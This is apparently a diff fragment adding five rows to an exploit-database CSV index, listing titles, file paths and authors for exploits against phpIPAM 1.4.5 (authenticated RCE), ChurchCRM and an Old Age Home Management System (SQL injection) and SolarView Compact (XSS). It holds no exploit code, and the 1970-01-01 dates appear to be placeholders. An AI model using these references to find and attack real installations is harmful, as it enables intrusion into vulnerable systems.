+50963,exploits/php/webapps/50963.py,"phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Guilherme Alves",webapps,php,
+50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
+50966,exploits/php/webapps/50966.txt,"Old Age Home Management System 1.0 - SQLi Authentication Bypass",1970-01-01,twseptian,webapps,php,
+50967,exploits/hardware/webapps/50967.txt,"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware,
+50968,exploits/hardware/webapps/50968.txt,"SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware,